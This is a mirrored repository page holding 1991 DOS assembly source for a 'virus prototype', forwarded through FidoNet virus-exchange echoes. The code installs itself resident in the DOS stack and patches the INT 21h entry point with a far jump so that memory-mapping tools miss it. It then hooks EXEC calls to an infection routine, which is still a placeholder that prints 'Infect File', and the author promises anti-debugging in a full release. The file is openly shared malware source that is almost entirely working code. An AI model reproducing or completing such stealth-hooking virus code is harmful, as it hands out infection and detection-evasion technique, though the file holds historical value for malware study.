mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
230 lines
7.3 KiB
NASM
230 lines
7.3 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 22 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : STACKVIR.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Graham Allen, 2:283/718 (06 Nov 94 16:43)
|
||
;* To : Edwin Cleton
|
||
;* Subj : STACKVIR.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org
|
||
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
|
||
;± ±
|
||
;± V I R U S P R O T O T Y P E ±
|
||
;± ±
|
||
;± Author : Waleri Todorov, CICTT, (C)-Copyright 1991, All Rights Rsrvd ±
|
||
;± Date : 25 Jan 1991 21:05 ±
|
||
;± Function : Found DOS stack in put himself in it. Then trace DOS ±
|
||
;± function EXEC and type 'Infect File' ±
|
||
;± ±
|
||
;± ±
|
||
;± If you want to have fun with this program just run file STACK.COM ±
|
||
;± Don't worry, this is not a virus yet, just try to find him in memory ±
|
||
;± with PCTools and/or MAPMEM. If you can -> just erase the source - it is ±
|
||
;± useless for you. If you can't -> you don't have to look at it - it is too ±
|
||
;± difficult to you to understand it. ±
|
||
;± Best regards, Waleri Todorov ±
|
||
;± ±
|
||
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
|
||
|
||
|
||
|
||
|
||
mov ah,52h ; Get DOS segmenty
|
||
int 21h
|
||
|
||
cmp ax,1234h ; Also check for already here
|
||
jne Install ; If not -> install in memory
|
||
ReturnControl
|
||
|
||
int 20h ; This program will give control
|
||
; to main file
|
||
Install
|
||
mov ax,es ; mov DOS segment in AX
|
||
mov DosSeg,ax ; Save DOS segment for further usage
|
||
mov ds,ax ; DS now point in DOS segment
|
||
|
||
call SearchDos ; Search DOS entry point
|
||
call SearchStack ; Search DOS stack
|
||
|
||
push cs ; DS=ES=CS
|
||
push cs
|
||
pop ds
|
||
pop es
|
||
|
||
mov ax,DosSeg ; get DOS segment in AX
|
||
mov cl,4 ; AX*=16
|
||
shl ax,cl
|
||
mov bx,StackOff ; Stack new begin in BX
|
||
and bx,0FFF0h ; Mask low 4 bit
|
||
add ax,bx ; Compute new real address
|
||
mov cl,4 ; AX/=16
|
||
shr ax,cl ; Now we get SEGMENT:0000
|
||
sub ax,10h ; Segment-=10-> SEG:100h
|
||
mov StackOff,ax ; Save new segment for further usage
|
||
mov es,ax ; ES point in DOS New area
|
||
mov si,100h ; ES:DI -> DOS:free_space_in_stack
|
||
mov di,si ; DS:SI Current segment
|
||
mov cx,512d ; Virus is only 512 bytes long
|
||
rep movsb ; Move virus to new place
|
||
|
||
; Installing virus in DOS' stack we will avoid a conflict with PCTools,
|
||
; MAPMEM, and other sys software. Remark, that no one DOS buffer wasn't
|
||
; affected, so if you have program, that count DOS' buffers to found
|
||
; Beast666, she won't found anything.
|
||
; In further release of full virus I will include anti-debugger system,
|
||
; so you will not be able to trace virus
|
||
|
||
mov di,DosOff ; ES:DI point to DOS int21 entry point
|
||
mov ax,DosSeg
|
||
mov es,ax
|
||
mov al,0EAh ; JMP XXXX:YYYY
|
||
stosb
|
||
mov ax,offset Entry21
|
||
stosw ; New 21 handler's offset
|
||
mov ax,StackOff
|
||
stosw ; New 21 handler's segment
|
||
|
||
|
||
; Now DOS will make far jump to virus. In case that virus won't
|
||
; get vector 21 directly, MAPMEM-like utilities won't show int 21 catching,
|
||
; and DOSEDIT will operate correctly (with several virus he don't).
|
||
|
||
inc di
|
||
inc di
|
||
mov Int21off,di ; Virus will call DOS after jump
|
||
jmp ReturnControl ; Return control to file
|
||
|
||
; At this moment, return control is just terminate program via int 20h.
|
||
; In further release of full virus this subroutine will be able to
|
||
; return control to any file (COM or EXE).
|
||
|
||
|
||
|
||
; These are two scanners subroutine. All they do are scanning DOS segment
|
||
; for several well-known bytes. Then they update some iternal variables.
|
||
; Be patience, when debug this area!
|
||
|
||
SearchDos
|
||
mov ax,cs:[DosSeg]
|
||
mov ds,ax
|
||
xor si,si
|
||
|
||
Search1
|
||
lodsw
|
||
cmp ax,3A2Eh
|
||
je NextDos1
|
||
dec si
|
||
jmp short Search1
|
||
NextDos1
|
||
lodsb
|
||
cmp al,26h
|
||
je LastDos
|
||
sub si,2
|
||
jmp short Search1
|
||
LastDos
|
||
inc si
|
||
inc si
|
||
lodsb
|
||
cmp al,77h
|
||
je FoundDos
|
||
sub si,5
|
||
jmp short Search1
|
||
FoundDos
|
||
inc si
|
||
mov cs:[Int21off],si
|
||
sub si,7
|
||
mov cs:[DosOff],si
|
||
ret
|
||
|
||
SearchStack
|
||
xor si,si
|
||
Search2
|
||
lodsw
|
||
cmp ax,0CB8Ch
|
||
je NextStack1
|
||
dec si
|
||
jmp short Search2
|
||
NextStack1
|
||
lodsw
|
||
cmp ax,0D38Eh
|
||
je NextStack2
|
||
sub si,3
|
||
jmp short Search2
|
||
NextStack2
|
||
lodsb
|
||
cmp al,0BCh
|
||
je FoundStack
|
||
sub si,4
|
||
jmp short Search2
|
||
FoundStack
|
||
mov di,si
|
||
lodsw
|
||
sub ax,200h
|
||
stosw
|
||
mov cs:[StackOff],ax
|
||
ret
|
||
|
||
Entry21 ; Here is new int 21 handler
|
||
cmp ah,52h ; If GET_LIST_OF_LISTS
|
||
jne NextCheck
|
||
|
||
mov ax,1234h ; then probably I am here
|
||
mov bx,cs:[DosSeg] ; so return special bytes in AX
|
||
mov es,bx
|
||
mov bx,26h
|
||
iret ; Terminate AH=52h->return to caller
|
||
NextCheck
|
||
cmp ax,4B00h ; If EXEC file
|
||
jne GoDos
|
||
call Infect ; then file will be infected
|
||
GoDos
|
||
jmp dword ptr cs:[Int21off]
|
||
; Otherwise jump to DOS
|
||
Infect
|
||
push ds ; At this moment just write on screen
|
||
push dx
|
||
push ax
|
||
|
||
push cs
|
||
pop ds
|
||
mov dx,offset Txt
|
||
mov ah,9
|
||
CallDos
|
||
pushf ; Call real DOS
|
||
call dword ptr cs:[Int21off]
|
||
|
||
pop ax
|
||
pop dx
|
||
pop ds
|
||
ret
|
||
|
||
Int21off dw 0 ; Offset of DOS 21 AFTER jump to virus
|
||
DosSeg dw 0 ; DOS segment
|
||
StackOff dw 0 ; Offset of stack/New segment
|
||
DosOff dw 0 ; Offset of DOS 21 BEFIRE jump
|
||
Txt db 'Infect File$' ; Dummy text
|
||
|
||
;-+- FMail 0.96â
|
||
; + Origin: FidoNet * Mathieu Not‚ris * Brussels-Belgium-Europe (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/Twx Windows image
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|